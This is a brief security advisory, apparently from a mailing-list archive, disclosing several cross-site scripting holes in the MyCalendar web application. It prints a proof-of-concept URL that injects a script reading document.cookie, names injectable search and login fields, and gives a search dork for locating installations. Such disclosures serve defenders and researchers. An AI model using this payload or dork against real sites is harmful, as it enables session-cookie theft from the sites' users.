MyCalendar multiple XSS

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

* MyCalendar multiple XSS

* By : sn0oPy

* Risk : medium

* site : http://abledesign.com/programs/MyCalendar/
 

* exploit :

     XSS on the search menu : http://www.target.ma/calendar/index.php?go=search
     XSS on the url : http://www.target.ma/calendar/index.php?go=";><script>alert(document.cookie)</script>
     XSS on the username and password at http://www.target.ma/crown/cal/index.php?go=Login

* dork : intitle:"myCalendar"


* contact : sn0oPy@xxxxxxxxxxxxxxxxxxxxxxx

* Site : http://forums.avenir-geopolitique.net

* greetz : [subzero], Avg Team.

* Reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2686
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux